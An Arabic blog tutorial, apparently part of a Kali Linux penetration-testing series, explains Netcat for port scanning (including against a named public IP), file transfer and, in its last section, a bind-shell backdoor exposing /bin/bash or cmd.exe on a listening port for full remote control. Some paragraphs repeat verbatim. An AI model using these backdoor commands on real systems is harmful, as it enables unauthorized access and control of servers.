تعرفنا في موضوع سابق عن افضل أدوات توزيعة كالي لينكس الموجهة
للاختبار الاختراق وقمنا بتعريف موجز عن بعض الأدوات ،في هذا الموضوع سنتعرف بإذن
الله عن أداة Netcat التي تعد من افضل الادوات
للاختبار الاختراق.
Netcat
لهذه الأداة العديد من الخيارات و الاستخدامات المتعددة والخطيرة فتستطيع استعمالها لكثير من الأمور فهي تقوم بإرسال واستقبال البيانات باستعمال ـ TCP & UDP Protocolsلذلك تعد هذه الاداة بالمرتبة الرابعة في قائمة Top 100 Network Security Tools
فحص المنافذ المفتوحة في السيرفر
تستطيع أداة Netcat فحص المنافذ المفتوحة بالسيرفر ولكن Nmapأفضل وأسرع منها في ذلك (سأضع شرح لها قريبا ان شاء الله) وللقيام بهذه العملية نستعمل الأمر
لهذه الأداة العديد من الخيارات و الاستخدامات المتعددة والخطيرة فتستطيع استعمالها لكثير من الأمور فهي تقوم بإرسال واستقبال البيانات باستعمال ـ TCP & UDP Protocolsلذلك تعد هذه الاداة بالمرتبة الرابعة في قائمة Top 100 Network Security Tools
فحص المنافذ المفتوحة في السيرفر
تستطيع أداة Netcat فحص المنافذ المفتوحة بالسيرفر ولكن Nmapأفضل وأسرع منها في ذلك (سأضع شرح لها قريبا ان شاء الله) وللقيام بهذه العملية نستعمل الأمر
|
nc -v
-w1 SERVER-IP -z FromPort-ToPort
|
أما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ
مثال على ذلك
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ
مثال على ذلك
|
nc -v
-w1 64.233.183.147 -z 1-100
|
ولفحص أكثر من نطاق منافذ نستعمل الأمر
|
nc -v
-w1 -z 00.000.000.000 -z 1-100 400-500
|
ملاحظة: 00.000.000.000 هو
IP موقع معين على سبيل
المثال
نقل الملفات بين جهازك والسيرفر
من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل:
|
nc
SERVER-IP PORT < FILE
|
ونطبق الأمر في الجهاز المستقبل
|
nc -l
-p PORT > FILE
|
مثال لإرسال ملف اسمه data.txt عن طريق البورت 5555 مثلا
|
nc
192.168.0.45 5555 < data.txt
|
أما بالنسبة لاستقبال ملف
data.txt عن طريق
المنفذ 5555 ننفذ الأمر
|
nc -l
-p 5555 > data.txt
|
مع جعل اداة Netcat تعمل كـ Backdoor
هذه أخطر استعمالات الـ Netcat فهي تشكل خطورة على الجهاز و السيرفر بشكل عام حيث تمتاز أداة Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exeفي نظام الويندوز و /bin/bash في نظام لينكس مما يجعلك تستطيع تطبيق أوامر على السيرفر والتحكم به بشكل كامل، ولكي يتم تنفيذ هذه الخاصية باستعمال الأمر:
|
nc -l
-p PORT -e PROGRAM
|
مع اضافة
-d و -L في نظام الويندوز ليصبح الأمر
|
nc -l
-p PORT -d -e PROGRAM –L
|
مثال على هذه الخاصية نقوم بتطبيق الأمر
|
nc -l
-p 4455 -e /bin/bash
|
على السيرفر اذا كان السيرفر في نظام ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
/bin/bash الذي يستعمل في نظام لينكس الى cmd.exe الذي يستعمل في نظام الويندوز ليصبح الأمر بالشكل التالي:
/bin/bash الذي يستعمل في نظام لينكس الى cmd.exe الذي يستعمل في نظام الويندوز ليصبح الأمر بالشكل التالي:
|
nc -l
-p 4455 -e -d cmd.exe –L
|
وللاتصال بالسيرفر نطبق الأمر
|
nc -v
-n SERVER-IP 4455
|
وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر .
0 التعليقات :
إرسال تعليق